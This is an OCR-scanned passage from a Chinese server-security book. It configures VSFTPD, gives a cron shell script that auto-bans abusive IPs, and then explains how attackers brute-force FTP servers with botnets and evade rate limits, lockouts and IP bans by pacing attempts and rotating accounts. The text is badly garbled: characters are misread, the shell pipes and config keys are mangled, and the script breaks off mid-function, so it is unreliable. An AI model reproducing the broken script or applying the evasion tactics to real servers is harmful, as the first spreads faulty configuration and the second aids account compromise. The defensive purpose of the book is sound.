要 完成 上 述 服 务 器 配置 的 要 求 ， 我 们 需要 先 了 解 一 些 必 备 的 知识 : 首先 下 载 并 安装 
VSFTPD 2.3.2 版 本 。VSFTPD 功能 非常 强大 ， 通 过 修改 配置 文件 /etc/vsflpd/vsftpd.conf 基本 可 
以 完成 上 述 服务 器 配置 的 要 求 , 只 是 对 人 P 进行 自动 封禁 和 解 封 这 个 功能 需要 利用 Shell 脚本 来 
实现 。 基 本 功能 的 配置 比较 容易 ， 这 里 只 列 出 关键 的 几 条 : 

anon_max_rate=500000 # 限 制 下 载 速率 500k/s 


anon_upload_enable=NO # 以 下 3 条 用 于 设置 限制 用 户 上 传 文件 


anon_mkdir write enable=NO 


anon_ other write enable=NO 


max_per_ip=1 # 限 制 用 户 只 能 单线 程 下 载 (这 一 条 要 在 /etc/vsfipd/vsftpd.conf 中 设置 ) 
编写 自动 封禁 、 解 封 违规 耳 的 Shell 分 为 如 下 5 个 步骤 ; 


(1) 获取 所 有 正在 访问 VSFTPD 服务 器 的 客户 端的 瑟 地 址 列表 和 相应 的 PID 存 入 文件 
ip_list 中 ， 以 备 封禁 时 使 用 。 获 取 方 法 : 使 用 netstat -np 命令 。 

(2) 获取 违规 下 载 的 瑟 地 址 列表 并 存 入 相应 的 文件 中 ， 以 便 对 其 进行 封禁 。 获 取 方法 : 
通过 分 析 VSFTPD 服务 器 的 日 志文 件 来 获取 此 列表 ， 所 以 在 配置 VSFTPD 服务 器 的 时 候 一 定 
要 把 日 志 功能 开启 ， 在 配置 文件 vsftpd.conf 中 添加 : 


xferlog enable=YES 
xferlog file=/var/log/vsftpd.1o0g 


(3) 封 禁 banip@Stime 中 的 下 地 址 列表 ,封禁 方法 : 只 要 在 /etc/hosts.deny 中 加 入 VSFTPD 
的 人 P 地 址 ， 即 可 封 掉 该 耳 。 同 时 还 要 在 配置 文件 wsftpd.conf 中 添加 以 下 命令 ， 这 样 才能 使 
/etc/hosts.deny 中 的 配置 对 VSFTPD 生效 。 


tcp_wrappers=YES 


(4) 依次 踢 掉 封禁 的 每 一 个 全。 这 里 需要 说 明 一 下 ， 通 过 第 3 步 的 操作 并 不 能 立即 把 正 
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在 下 载 的 用 户 踢 掉 。 它 起 的 作用 就 是 在 用 户 登录 的 时 候 拒 绝 该 用 户 ,如果 用 户 正在 下 载 , 则 不 
会 受到 影响 ， 直 到 用 户 下 载 完 该 任务 ， 重 新 连接 时 才能 生效 。 鉴 于 此 ， 才 需要 本 步 操作 。 踢 掉 
JP 的 方法 : 杀 掉 该 全 下载 数据 所 用 的 PID。 我 们 知道 : 客户 端 FTP 软件 在 工作 时 需要 用 到 两 
个 端口 : 一 个 是 控制 端口 ， 这 个 一 般 都 是 21;， 另 一 个 是 数据 传输 端口 ， 该 端口 根据 服务 器 类 
型 的 不 同 也 将 不 同 , 如 果 服 务 器 是 PORT FTP, 那么 端口 默认 就 是 20; 如 果 服 务 器 是 PASV FTP， 
那么 端口 就 是 由 客户 端 随机 分 配 的 了 。 在 这 里 , 我 们 不 用 管控 制 端口 是 多 少 ， 只 需要 杀 掉 数据 
传输 端口 所 对 应 的 PID 就 可 以 了 。 

(5) 检查 封禁 列表 , 给 已 经 封禁 了 5 分 钟 的 他 解 封 。 因 为 前 面 封 禁 的 时 候 文件 名 就 是 用 
时 间 命 名 的 ， 所 以 查找 5 分 钟 前 封禁 的 文件 ， 然 后 在 /etc/hosts.deny 文件 中 把 列表 中 的 地 址 删 
除 即 可 。 


6.3.3 ”用 于 封禁 和 解 封 的 Shell 脚本 


#!/bin/bash 


#auto_banip.cron 
脚本 auto_banip.cron 的 代码 如 下 所 示 ， 这 段 代 码 在 RHEL 5 下 测试 通过 。 


#1 .为 了 优化 程序 ， 先 把 链接 的 IP 列表 倒 出 来 

netstat -np |grep "ESTABLISHED" |grep "vsftpd" | grep -V "192.168.12.8:21" awk 
'{ print $5,$7}' lawk -F\/ '{ print $1}' >/etc/vsftpd/ip list 

#2 .导出 需要 禁止 的 IP 地 址 ， 通 过 调整 两 个 参数 ‘8000 和 4) 可 以 调整 查询 的 力度 

time=$ (date+%R) 

#echo $time 

tail -8000 /var/log/vsftpd.1og |grep "too many" |grep "$time" | awk -F\" '{print 
$2 pulsork luniq -c lawk '$1>=4 {print 
"vsftpd:",$2}' >/etc/vsftpd/banip list/banip@$time 

#3 .封禁 这 些 用 户 的 IP 地 址 

denymulu="/etc/hosts.deny" 

cat /etc/vsftpd/banip list/banip@ $time>> $deny-mulu 

# 去 除 重复 行 

sort $denymulu |uniq >/etc/vsftpd/temp 

cat /etc/vsftpd/temp>$denymulu 

rm -f /etc/vsftpd/temp 

#4 . 立即 踢 掉 这 些 TP， 使 禁 封 TP 立即 生效 

大 非 ########## 自 定义 函数 ， 根 据 IP 封杀 有 用户 ######## 

kick ip() 

{ 

ip=$1 

pid=$ (cat /etc/vsftpd/ip list | grep "$ip" | awk '{print $2}') 

#echo $pid 

| 


6.3.4 部 署 实施 


只 需要 简单 的 部 署 一 下 : 假设 脚本 文件 名 为 auto_banip.cron。 我 们 需要 把 它 放 到 /ete/vsftpd/ 
下 ， 然 后 创建 /ete/vsftpd/banip_list 目录 ， 最 后 把 它 设置 到 Linux 操作 系统 的 任务 里 面 ， 每 分 钟 
执行 一 次 ， 它 就 能 为 我 们 自动 封禁 和 解 封 了 一 了。 

把 此 脚本 作为 任务 添加 。 编 辑 /etc/crontab 文件 ， 在 其 中 添加 以 下 命令 即 可 : 
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6.3.5 小 结 


VSFTP 在 实际 应 用 中 使 用 非常 广泛 ， 只 需要 简单 的 设置 就 能 满足 用 户 的 基本 需求 ， 因 此 ， 
笔者 对 这 个 软件 非常 青睐 。 本 节 提 到 的 Shell 脚本 可 以 弥补 这 款 软件 在 功能 上 的 一 点 点 瑕 疯 ， 
相信 很 多 同行 都 会 用 到 的 。 


6.4 暴力 破解 FTP 服务 器 的 技术 探讨 与 防范 


随 着 Internet 的 发 展 ， 出 现 了 大 量 傻瓜 式 的 黑客 工具 ， 任 何 一 种 黑客 攻击 手段 的 门槛 都 降 
低 了 很 多 ， 大 家 通常 会 认为 暴力 破解 攻击 只 是 针对 某 一 种 FTP 服务 器 发 起 的 攻击 ， 能 具有 代 
表 性 吗 ? 可 以 拓展 到 其 他 的 网 络 或 服务 器 上 吗 ? 答案 当然 是 肯定 的 。 暴 力 破 解 这 种 软件 , 使 用 
起 来 没有 什么 技术 含量 ， 原 理 就 是 一 个 接 一 个 地 试 , 直到 试验 出 正确 的 密码 ， 也 就 是 破解 成 功 
了 。 这 种 破解 方式 的 成 功 几率 不 高 ， 耗 费时 间 多 ， 技 术 成 分 低 ， 不 到 人 迫不得已 是 不 使 用 的 。 在 
网 络 的 实际 情况 中 , 很 多 FTP 服务 器 虽说 都 是 经 过 了 层 层 的 安全 防护 , 即便 是 经 过 防护 的 FTP 
服务 器 ， 同 样 可 以 在 攻击 者 简单 地 调整 攻击 方式 后 ， 运 用 暴力 破解 快速 突破 。 本 节 将 介绍 各 种 
攻击 技术 对 服务 器 的 影响 ， 仅 供 网 络 管理 人 员 在 平时 工作 中 制定 安全 防范 策略 时 参考 使 用 。 


6.4.1 网 络 本 身 的 负载 能 力 与 高 速 网 络 


所 有 的 网 络 攻击 ， 都 是 基于 网 络 而 发 起 的 ， 这 就 决定 了 网 络 是 一 切 网 络 攻击 、 安 全 防护 技 
术 的 根本 。 如果 攻 击 者 处 于 一 个 网 络 资源 极度 缺乏 的 环境 之 中 , 想 要 发 起 高 级 的 网 络 攻击 也 是 
力不从心 的 。 同时 , 如 果 防 御 者 处 于 一 个 并 非 优 秀 的 网 络 中 ,网 络 正常 服务 本 身 都 很 难为 用 户 
提供 ， 更 不 用 说 进行 网 络 安全 防护 了 。 


1. 网 络 带 宽 的 束缚 


从 国内 刚刚 出 现 互联 网 开始 , 到 今天 网 络 的 普及 , 网 龄 比较 长 的 网 民 都 经 历 了 使 用 调制 解 
调 器 拨号 上 网 的 举步维艰 ， 也 都 经 历 了 1Mb/s、2Mb/s 甚至 10Mb/s 的 高 速 网 络 ， 而 网 络 安全 ， 
同样 经 历 了 这 样 的 一 个 由 慢 到 快 、 从 低速 到 高 速 的 过 程 ， 在 这 个 过 程 之 中 , 很 多 原本 看 起 来 根 
本 不 可 能 的 攻击 技术 , 也 已 经 可 以 很 顺畅 地 发 起 了 。 很 多 攻击 者 在 进行 这 样 的 攻击 时 ， 都 会 发 
现 一 个 很 奇特 的 现象 : 刚刚 对 目标 发 起 了 分 布 式 的 暴力 破解 攻击 ，10 分 钟 后 目标 服务 器 因为 
带宽 拥堵 ， 竞 然 瘫 痪 了 …… 

对 攻击 者 来 说 , 这 是 很 让 人 啼笑 皆 非 的 事情 , 因为 攻击 者 的 目标 原本 是 为 了 通过 暴力 破解 
获得 某 些 机 密 的 、 内 部 的 FTP 资料 ， 但 是 无 意 间 却 造成 了 目标 服务 器 的 整体 凑 痪 ， 这 显然 是 
攻击 者 不 愿意 看 到 的 结果 。 这 也 是 攻击 者 和 网 络 安全 工程 师 因为 网 络 带宽 造成 的 困扰 之 一 。 

另 一 方面 ， 暴 力 破 解 因为 自身 特性 , 所 有 的 验证 过 程 都 是 通过 向 服务 器 提交 信息 、 获 得 服 
务 器 返回 信息 并 进行 判断 而 进行 的 。 在 这 个 过 程 中 , 不 管 是 服务 器 的 网 络 带宽 质量 , 还 是 攻击 
者 使 用 的 僵尸 计算 机 本 身 的 网 络 带宽 速度 ,都 在 很 大 程度 上 决定 了 暴力 破解 整个 完成 时 间 的 长 
短 。 就 目前 的 网 络 带 宽 来 说 ， 要 顺畅 、 高 速 地 发 起 FTP 的 暴力 破解 攻击 ， 还 是 有 一 定 难度 的 。 
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一 般 情 况 下 攻击 者 动用 上 百 台 僵尸 计算 机 进行 攻击 就 已 经 是 暴力 破解 的 极限 了 , 因为 即使 再 增 
加 僵尸 计算 机 ， 网 络 带 宽 的 限制 也 不 允许 更 多 数据 收发 的 进行 ,所 以 ， 第 二 个 限制 暴力 破解 攻 
击 整体 效率 提高 的 因素 就 是 僵尸 计算 机 本 身 的 网 络 带 宽 质量 。 

从 现 阶 段 国 内 四 处 都 在 进行 的 寿 艇 烈 烈 的 网 络 提速 来 看 , 不 难 预见 不 久 的 将 来 , 整体 网 络 
速度 将 有 非常 大 的 提高 。 就 像 今天 国际 公认 的 平均 个 人 网 速 最 快 的 国家 一 一 韩国 一 样 ， 人均 网 
速达 到 10Mb/s、20Mb/s 甚至 更 多 。 

虽然 网 络 速 度 的 提升 正在 飞速 地 发 展 着 , 但 是 对 攻击 者 来 说 , 不 可 能 恰好 就 遇 到 拥有 高 速 
网 络 的 僵尸 计算 机 或 者 目标 服务 器 。 于 是 就 有 读者 提问 : 现 阶段 的 攻击 者 是 如 何 解决 网 络 带宽 
的 问题 的 呢 ? 以 后 如 果 出 现 网 络 整体 速度 都 得 到 很 大 提升 的 时 候 , 攻击 者 的 暴力 破解 攻击 又 将 
有 怎么 样 的 发 展 呢 ? 


2. 内 部 高 速 网 络 和 分 布 式 破解 解决 带宽 难题 


先 解决 第 一 个 问题 : 现 阶段 的 攻击 者 是 如 何 解 决 网 络 带宽 的 问题 的 呢 ? 举例 来 说 , 一 个 攻 
击 者 企图 获得 某 会 员 制 网 站 的 FTP 账户 权限 ， 因 为 里 面 有 很 多 内 部 付费 使 用 的 资料 。 但 是 这 
个 会 员 制 网 站 服务 器 的 网 络 带 宽 质量 并 不 高 , 如 果 采 用 分 布 式 的 暴力 破解 攻击 , 可 能 十 几 台 从 
性 计算 机 就 足以 让 这 个 服务 器 瘫痪 了 ， 攻 击 者 显然 是 不 愿意 看 到 这 样 的 情况 发 生 。 

在 实际 的 网 络 攻击 案例 中 ， 很 多 攻击 者 都 遇 到 了 这 样 的 问题 ， 他 们 的 解决 方法 也 很 巧妙 ， 
也 非常 实用 : 利用 内 部 网 络 通信 的 高 速 来 解决 暴力 破解 的 网 络 带宽 难题 。 具 有 一 定 网 络 经 验 的 
网 民 都 知道 ， 我 国 现在 的 服务 器 ， 一 般 都 是 托管 在 IDC 或 者 机 房 的， 而 正常 情况 下 IDC 或 者 
机 房 会 进行 很 多 的 网 络 带宽 限制 , 在 机 房 的 入 口 路 由 或 者 机 柜 的 防火 墙 上 限制 带宽 , 让 由 外 对 
内 的 网 络 带 宽 变 得 很 窗 一 一 毕竟 机 房 在 很 多 情况 下 都 是 通过 带宽 来 进行 托管 收费 的 。 

现在 的 服务 器 配置 一 般 都 是 千 兆 网 卡 ， 但 是 对 外 的 网 络 带宽 不 可 能 做 到 千 兆 全 开 。 一 
般 中 小 站 点 能 购买 S 一 10Mbys 的 独立 带宽 就 很 不 错 了 ， 也 就 是 说 这 样 的 服务 器 在 提供 对 外 
访问 的 时 候 ， 网 络 堵塞 了 ， 用 户 打 不 开 网 站 了 ，FTP 无 法 提供 正常 服务 ， 但 实际 上 就 服务 
器 本 身 的 硬件 性 能 来 说 ， 还 有 极 大 的 容 余 可 以 用 来 提供 网 络 服 务 ， 只 是 出 入 口 网 络 带宽 不 
足 而 已 。 就 目前 国内 的 整体 网 络 安全 意识 来 看 ， 对 资深 的 攻击 者 来 说 ， 在 一 个 存放 着 几 百 
台 服 务 器 的 机 房 中 寻找 一 台 “ 肉 鸡 ”， 并 不 是 很 难 的 技术 问题 。 找 到 这 样 的 内 部 服务 器 有 
什么 用 呢 ? 攻击 者 当然 可 以 选择 用 来 发 起 暴力 破解 攻击 。 对 一 个 千 兆 网 卡 来 说 ， 如 果 是 在 
内 部 网 络 中 进行 访问 ， 数 据 的 中 转 和 网 络 损耗 是 可 以 忽略 的 。 这 就 好 比 由 一 个 1Mb/s 的 
ADSL 猫 连 接 的 两 个 家 用 计算 机 ， 虽 然 从 网 络 上 下 载 文 件 大 概 只 有 150MB/s 的 速度 ， 但 是 
如 果 两 个 计算 机 之 间 传 送 文件 的 话 ，8Mb/s 的 内 网 速度 还 是 很 容易 实现 的 ， 所 以 ， 现 阶段 
的 攻击 者 如 果 想 要 发 起 效率 非常 高 的 FTP 暴力 破解 , 在 目标 服务 器 的 网 络 带 宽 存 在 束缚 的 
时 候 ， 找 到 一 台 “ 肉鸡” 服务 器 ， 并 利用 内 部 网 络 高 速 的 特点 可 以 很 容易 实现 。 

再 说 说 另 一 个 问题 : 以 后 如 果 出 现 网 络 整 体 速度 都 得 到 很 大 提升 的 情况 , 攻击 者 的 暴力 破 
解 攻击 又 将 有 怎么 样 的 发 展 呢 ?其 实 同 第 一 个 问题 相 比 ,这 个 问题 已 经 在 较 大 范围 内 得 到 了 解 
决 , 而 且 很 多 攻击 者 现在 就 是 这 样 发 起 攻击 的 ， 那 就 是 : 分 布 式 暴 力 破 解 。 之 所 以 有 些 攻击 者 
因为 网 络 带 宽 的 问题 无 法 发 起 大 范围 的 分 布 式 暴力 破解 攻击 , 原因 更 多 的 还 是 目标 服务 器 的 网 
络 带宽 限制 ， 而 不 是 僵尸 计算 机 本 身 的 网 络 带 宽 。 因 为 僵尸 计算 机 的 网 络 带 宽 就 算 不 足 ， 就 算 
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很 慢 , 攻击 者 完全 可 以 使 用 数量 代 蔡 质量 的 方式 , 利用 很 多 网 络 带 宽 不 好 的 僵尸 计算 机 发 起 大 
规模 的 暴力 破解 ， 毕竟 因为 网 络 安全 意识 低下 ,僵尸 计算 机 还 是 很 容易 捕获 的 。 当 目标 服务 器 
的 带宽 在 不 久 的 未 来 得 到 大 力 提 升 的 时 候 , 攻击 者 完全 可 以 利用 成 千 上 万 的 僵尸 计算 机 发 起 大 
规模 的 分 布 式 暴力 破解 攻击 , 只 要 目标 计算 机 的 网 络 带 宽 足 以 承受 这 样 的 攻击 , 那么 攻击 者 在 
极 短 的 时 间 内 就 可 以 完成 看 似 非常 庞大 的 密码 集 的 暴力 破解 攻击 。 


6.4.2 ”CPU 运算 、 处 理 能 力 低下 的 解决 方法 


同 几 年 前 的 硬件 性 能 相 比 ,现在 的 计算 机 、 服 务 器 的 运算 处 理 能 力 已 经 得 到 了 飞速 的 发 展 。 
正如 计算 机 专家 普遍 认为 的 那样 ， 可 以 预见 的 是 , 硬件 处 理 能 力 将 在 很 长 一 段 时 间 内 ,持续 而 
稳定 地 高 速 提高 。 


1. 运算 处 理 能 力 的 束缚 


单 就 暴力 破解 来 说 ， 运 算 处 理 能 力 包括 两 方面 的 束缚 : 一 方面 是 目标 服务 器 的 处 理 能 力 ， 
另 一 方面 是 发 起 攻击 的 计算 机 的 处 理 能 力 。 目 标 服 务 器 的 处 理 能 力 决定 了 攻击 者 可 以 发 起 多 大 
量 级 的 规模 攻击 。 

如 针对 一 个 普通 的 小 型 FTP 服务器， 典型 的 配置 是 4GB 左右 的 CPU 速度 ，2 一 4GB 的 内 
存 容 量 。 针 对 这 样 的 小 型 FTP 服务 器 ， 在 不 考虑 网 络 带宽 的 理论 情况 下 ， 攻 击 者 使 用 每 秒 
10000 一 20000 次 左右 的 暴力 破解 攻击 效率 就 基本 达到 了 极限 ， 就 算 攻 击 者 发 起 更 高 效率 的 暴 
力 破 解 也 无 法 获得 更 快 的 结果 。 在 实际 情况 中 , 攻击 者 要 发 起 此 效率 的 攻击 是 比较 简单 的 ， 甚 
至 不 用 使 用 到 大 规模 的 僵尸 计算 机 群 就 可 以 做 到 。 

随 着 计算 机 硬件 的 发 展 , 如 果 服 务 器 在 处 理 包 含 了 数 个 指令 的 FTP 暴力 破解 信息 的 时 候 ， 
能 够 做 到 每 秒 理论 上 数 十 万 、 数 百 万 次 的 请 求 和 应 答 运 算 , 那 攻 击 者 完全 就 可 以 放 开 手脚 进行 
暴力 破解 攻击 了 。 

在 现在 的 网 络 中 ， 有 些 攻击 者 动用 庞大 的 僵尸 计算 机 群 ， 发 起 每 秒 十 万 次 的 FTP 暴力 破 
解 请 求 ， 因 为 FTP 暴力 破解 的 过 程 是 通过 连接 服务 器 一 获得 连接 信息 一 发 送 账户 一 获得 需求 
密码 信息 一 发 送 可 能 的 密码 一 获得 反馈 信息 一 再 次 发 起 服务 器 连接 ， 这 样 的 过 程 循环 进行 的 ， 
所 以 看 似 快速 的 服务 器 处 理 能 力 并 不 能 满足 不 断 堆 积 的 攻击 者 计算 机 的 连接 请 求 .这 就 导致 了 
很 多 攻击 计算 机 发 送 的 密码 验证 信息 被 丢弃 , 攻击 计算 机 无 法 获得 正常 的 服务 器 返回 信息 , 最 
终 导 致 暴力 破解 失败 。 发 起 攻击 的 计算 机 的 处 理 能 力 决 定 了 攻击 者 是 否 需要 动用 分 布 式 的 暴力 
破解 攻击 。 同 被 攻击 目标 服务 器 不 同 的 是 , 被 攻击 者 控制 的 僵尸 计算 机 的 运算 能 力 并 不 直接 决 
定 暴 力 破解 的 成 败 ， 而 是 对 暴力 破解 的 整个 时 间 和 成 功率 有 非常 重要 的 影响 。 

在 理论 极限 中 ， 不 考虑 网 络 带 宽 ， 只 考虑 硬件 处 理 能 力 的 情况 下 ， 假 设 FTP 服务 器 每 次 
处 理 一 个 完整 的 FTP 连接 请 求 需要 万 分 之 一 秒 , 而 同时 能 处 理 的 请 求 数 目 是 10 000 个 。 那 么 ， 
最 完美 的 暴力 破解 模型 是 使 用 10 000 个 僵尸 计算 机 ， 完 成 万 分 之 一 秒 内 的 暴力 破解 攻击 。 也 
就 是 说 ,在 最 小 的 目标 服务 器 的 处 理 能 力 下 , 使 用 目标 服务 器 最 大 的 处 理 能 力 来 进行 暴力 破解 。 
这 样 的 暴力 破解 攻击 的 成 功率 在 理论 上 是 100%, 而 在 保证 了 成 功率 的 基础 上 , 时 间 是 最 短 的 。 
那么 ， 现 在 的 攻击 者 是 如 何 解决 服务 器 和 僵尸 计算 机 运算 处 理 能 力 的 呢 ? 
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2. 分 布 式 暴力 破解 提高 成 功率 


分 布 式 暴力 破解 在 很 多 时 候 是 提高 成 功率 的 保障 。 对 攻击 者 来 说 , 目标 服务 器 的 处 理 能 力 
是 不 可 控 的 , 攻击 者 是 无 法 提高 目标 服务 器 的 处 理 能 力 的 , 所 以 必须 适应 目标 服务 器 的 处 理 能 
力 ， 由 此 才 采 用 了 分 布 式 的 暴力 破解 技术 。 

采用 分 布 式 穷 举 的 好 处 是 : 在 攻击 者 不 知道 目标 服务 器 的 负载 能 力 的 时 候 , 可 以 通过 灵活 
的 调整 僵尸 计算 机 的 数量 ,来 逐渐 摸索 目标 服务 器 的 负载 能 力 , 以 便 达到 在 目标 服务 器 不 丢 包 、 
不 误 报 的 情况 下 ,在 保证 最 高 成 功率 的 前 提 下 ， 尽 量 缩短 暴力 破解 的 时 间 。 举 例 来 说 ， 如 果 目 
标 服务 器 的 负载 能 力 是 每 秒 处理 1000 次 FTP 连接 、 账 户 密码 验证 、 信 息 发 送 ， 攻 击 者 如 果 使 
用 每 秒 可 以 完成 10 次 上 述 过 程 的 僵尸 计算 机 进行 暴力 破解 , 攻击 者 使 用 了 10 000 台 僵 尸 计算 
机 ， 那 目标 服务 器 的 运算 能 力 显然 是 跟 不 上 的 ,也 就 可 能 出 现 误 报 或 者 错误 的 情况 , 最 佳 的 情 
况 是 使 用 100 台 僵 尸 计 算 机 ,满足 目标 服务 器 的 运算 处 理 能 力 最 大 化 ,并 且 也 能 够 在 保证 100% 
成 功 的 基础 上 最 大 化 地 缩小 暴力 破解 时 间 。 

总 的 来 说 , 分 布 式 暴力 破解 是 对 攻击 者 的 攻击 经 验 的 一 种 考验 。 如 果 分 布 的 僵尸 计算 机 数 
量 太 多 ， 结 果 可 能 是 很 快 完 成 了 暴力 破解 ， 但 是 因为 误 报 和 丢弃 的 存在 ， 而 无 法 获得 正确 的 密 
码 ; 如 果 分 布 的 僵尸 计算 机 数量 太 少 , 虽然 可 以 很 稳妥 地 进行 暴力 破解 攻击 , 获得 想 要 的 密码 ， 
但 是 时 间 可 能 极 长 。 


3. 根据 僵尸 计算 机 的 性 能 编写 高 效率 的 暴力 破解 程序 


另外 一 个 能 在 保证 成 功率 的 前 提 下 , 同时 大 大 缩短 暴力 破解 时 间 的 方法 是 调整 暴力 破解 程 
序 的 运行 速度 。 一 个 适合 僵尸 计算 机 处 理 能 力 的 暴力 破解 程序 在 攻击 过 程 中 是 非常 重要 的 。 

如 果 暴 力 破解 程序 在 僵尸 计算 机 上 运行 很 吃力 , 已 经 超出 了 僵尸 计算 机 的 处 理 能 力 , 结果 
可 能 是 原本 正确 的 密码 也 得 不 到 相应 的 正确 结果 , 因为 僵尸 计算 机 已 经 无 法 完成 各 种 信息 的 收 
发 和 处 理 了 。 

如 果 暴 力 破解 程序 在 僵尸 计算 机 上 运行 得 很 轻松 ,系统 性 能 有 很 多 的 容 余 , 这 样 的 情况 下 ， 
整个 暴力 破解 的 时 间 将 会 很 长 ,所 以 , 要 发 起 一 个 在 保证 成 功率 的 前 提 下 , 还 要 尽量 缩短 暴力 
破解 时 间 的 攻击 ， 需 要 攻击 者 根据 自己 的 僵尸 计算 机 的 情况 ， 选 择 不 同 的 暴力 破解 程序 消耗 ， 
以 尽量 达到 成 功率 和 时 间 两 者 的 平衡 。 


6.4.3 ”安全 策略 的 突破 


如 果苗 刻 地 说 网 络 带 宽 和 运算 处 理 能 力 都 是 非 技术 因素 , 无 法 可 控 地 进行 优化 的 话 , 那么 
安全 策略 就 是 最 直接 也 是 最 有 效 的 防御 措施 了 。 对 于 暴力 破解 来 说 , 安全 策略 在 很 大 程度 上 对 
暴力 破解 的 成 功率 、 时 间 甚 至 是 否 能 发 起 攻击 都 存在 着 很 大 的 影响 。 不 过 之 所 以 说 暴力 破解 是 
一 种 放 之 四 海 而 沸 准 的 攻击 方式 , 就 在 于 它 可 以 经 过 攻击 者 简单 的 变化 , 而 达到 突破 安全 策略 
的 目的 。 需 要 指出 的 是 ， 本 节 的 安全 策略 是 单独 的 和 暴力 破解 相关 的 安全 策略 ， 并 没有 涉及 诸 
如 密码 期 限 、 密 码 长 度 、 通 信 加 密 等 与 暴力 破解 无 关 的 安全 策略 。 
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1. 连接 频率 限制 及 其 突破 


随 着 网 络 安全 意识 的 逐渐 提高 ， 重 视 安全 的 管理 员 一 般 会 限制 FTP 服务 器 的 连接 频率 。 
所 谓 的 连接 频率 是 指 管理 员 定 义 了 在 特定 时 间 段 内 的 同一 用 户 的 连接 次 数 , 在 这 个 次 数 限 制 之 
内 可 以 任意 连接 ， 如 果 超 出 这 个 次 数 限制 则 拒绝 连接 。 

网 络 安全 工程 师 或 管理 员 通 过 对 连接 频率 的 限制 ， 一 方面 可 以 合理 地 分 配 FTP 服务 器 的 
处 理 运算 能 力 , 避免 出 现 某 一 个 用 户 因 为 使 用 了 超 快 的 连接 而 大 量 占用 服务 器 资源 的 情况 , 另 
一 方面 可 以 对 普通 的 基于 账户 密码 的 暴力 破解 攻击 进行 行 之 有 效 的 限制 。 

实际 网 络 中 也 存在 其 他 时 间 和 连接 频率 限制 的 规则 , 不 一 定 是 5 秒 一 次 连接 , 也 不 一 定 是 
10 秒 后 才 人 允许 下 一 次 连接 。 如 果 是 默认 的 高 效率 的 FTP 暴力 破解 ， 一 般 情 况 下 都 是 一 秒 发 起 
上 百 次 连接 尝试 ， 大 大 地 超出 了 服务 器 允许 的 范围 ， 所 以 这 样 的 暴力 破解 显然 是 不 能 成 功 的 ， 
会 被 服务 器 一 直 拒 绝 连接 。 针 对 这 样 的 情况 , 有 经 验 的 攻击 者 在 发 现 目标 服务 器 存在 这 样 的 连 
接 频 率 限制 以 后 , 会 适当 修改 暴力 破解 程序 的 连接 频率 ,让 攻击 程序 在 满足 安全 策略 的 前 提 下 
进行 暴力 破解 。 

比如 , 攻击 者 完全 可 以 定义 攻击 程序 每 5.1 秒 进行 一 次 FTP 暴力 破解 尝试， 以 达到 躲 开 安 
全 策略 限制 的 目的 。 这 样 的 频率 限制 策略 看 似 在 效率 上 大 大 阻碍 了 暴力 破解 的 进行 , 但 是 如 果 
只 有 这 一 种 安全 策略 的 话 , 是 无 法 阻挡 攻击 者 发 起 高 效 的 暴力 破解 的 , 实际 上 攻击 者 可 以 通过 
其 他 攻击 策略 的 改变 来 变相 提高 整个 暴力 破解 的 效率 。 


2. 尝试 错误 次 数 限 制 及 其 突破 


同 连接 频率 相 比 ， 错 误 次 数 限制 更 常见 一 些 ， 网 络 上 很 多 FTP 服务 器 的 管理 员 或 者 工程 
师 都 使 用 了 这 个 安全 策略 。 尝 试 错误 次 数 限 制 是 指 某 FTP 用 户 的 错误 发 生 次 数 ， 当 该 用 户 的 
密码 尝试 次 数 超过 规定 的 次 数 以 后 ， 则 短期 拒绝 该 用 户 的 连接 。 举 例 来 说 ， 网 络 安全 工程 师 可 
以 设 定 这 样 的 安全 策略 : 从 某 用 户 尝试 登录 开始 ， 连 续 5 次 输入 密码 错误 ， 则 返回 错误 信息 ， 
并 在 FTP 系统 中 拒绝 该 用 户 的 下 一 次 密码 验证 ， 直 到 超过 设 定 的 限制 时 间 。 

这 样 做 的 好 处 是 可 以 在 很 大 程度 上 限制 普通 暴力 破解 攻击 的 发 起 , 因为 很 多 暴力 破解 攻击 
都 是 在 无 数 的 错误 中 找寻 一 个 正确 的 密码 。 如 果 遇 到 这 样 的 策略 , 暴力 破解 就 几乎 没有 成 功率 
可 言 了 。 不 过 错误 次 数 限制 实际 上 也 是 可 以 突破 的 ， 而 且 突破 的 方法 也 并 不 难 。 

对 于 有 经 验 的 攻击 者 来 说 , 一 旦 发 现 目标 系统 存在 错误 次 数 限制 , 则 会 通过 手工 验证 的 方 
式 ， 彻 底 摸 清 究竟 允许 几 次 密码 错误 ， 后 续 的 拒绝 连接 时 间 究 竟 是 多 少 ? 一 旦 弄 明白 这 两 点 ， 
攻击 者 会 很 容易 调整 暴力 破解 策略 ， 突 破 次 数 限制 。 举 例 来 说 ， 如果 管理 员 限 制 了 5 次 连续 错 
误 后 30 秒 不 允许 连接 ， 则 攻击 者 可 以 定义 暴力 破解 程序 以 5 次 为 一 个 循环 ， 每 发 起 5 次 攻击 
就 暂停 30 秒 ， 然 后 再 继续 尝试 。 另 外 一 种 方式 是 每 5 次 尝试 一 个 新 账户 ， 在 服务 器 开始 拒绝 
当前 账户 连接 的 时 候 , 使 用 新 的 账户 进行 暴力 破解 尝试 , 直到 所 有 的 用 户 名 都 尝试 过 一 遍 再 重 
头 开 始 。 还 有 一 个 大 多 数 攻击 者 采用 的 方式 就 是 利用 分 布 式 的 攻击 来 解决 错误 次 数 的 限制 , 即 
在 30 秒 的 限制 时 间 内 ， 每 台 僵尸 计算 机 都 使 用 独立 的 几 秒 钟 ， 然 后 再 进行 后 续 的 尝试 。 
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3.IP 锁定 及 其 突破 


同上 面 的 两 种 安全 策略 相 比 ，IP 锁定 比较 难 解决 一 些 ， 不 过 只 要 目标 FTP 考虑 让 正常 用 
户 使 用 ， 那 暴力 破解 就 肯定 可 以 发 起 。 卫 锁定 策略 一 般 是 和 连接 频率 、 错 误 次 数 策略 配合 使 
用 ,也 就 是 说 当 某 账户 进行 连接 以 后 ， 如 果 连 接 频 率 过 高 , 或 者 错误 次 数 超过 限制 ， 则 开始 运 
用 他 锁定 策略 。 

在 实际 网 络 中 ,IP 锁定 策略 有 两 个 典型 的 应 用 方式 ， 一 种 是 当 某 账户 出 现 异常 以 后 ，FTP 
服务 器 记录 这 个 账户 的 也 地 址 ， 然 后 加 入 自己 的 黑 名 单 ， 从 此 以 后 均 拒绝 此 IP 的 连接 (除非 
该 用 户 联系 管理 员 解 除 黑 名 单 限制 ) ， 另 一 种 方式 是 IP 限制 是 暂时 的 ， 过 一 段 时 间 会 自动 解 
除 。 针 对 自动 解除 限制 的 情况 ， 攻 击 者 可 以 用 一 样 的 方法 : 调整 暴力 破解 的 循环 时 间 ， 在 限制 
